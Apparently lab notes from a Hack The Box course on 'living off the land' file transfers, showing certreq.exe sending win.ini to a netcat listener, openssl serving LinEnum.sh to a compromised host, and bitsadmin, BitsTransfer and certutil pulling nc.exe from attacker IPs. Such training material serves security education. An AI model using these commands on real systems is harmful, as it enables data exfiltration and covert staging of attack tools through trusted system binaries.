Living off the land (LOLBAS & GTFOBins)
Post

Living off the land (LOLBAS & GTFOBins)

Upload win.ini to our Pwnbox

This will send the file to our Netcat session, and we can copy-paste its contents.

1
C:\htb> certreq.exe -Post -config http://192.168.49.128/ c:\windows\win.ini

File Received in our Netcat Session

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Shuciran@htb[/htb]$ sudo nc -lvnp 80

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/json
User-Agent: Mozilla/4.0 (compatible; Win32; NDES client 10.0.19041.1466/vb_release_svc_prod1)
Content-Length: 92
Host: 192.168.49.128

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

GTFOBins

To search for the download and upload function in GTFOBins for Linux Binaries, we can use +file download or +file upload.

GTFOBins

OpenSSL

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
Shuciran@htb[/htb]$ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem

Generating a RSA private key
.......................................................................................................+++++
................+++++
writing new private key to 'key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:

Stand up the Server in our Pwnbox

1
Shuciran@htb[/htb]$ openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh

Download File from the Compromised Machine:

1
Shuciran@htb[/htb]$ openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh

Bitsadmin File Download

1
PS C:\htb> bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe

Download:

PS C:\htb> Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32/nc.exe" -Destination "C:\Windows\Temp\nc.exe"

Download a File with Certutil

1
C:\htb> certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe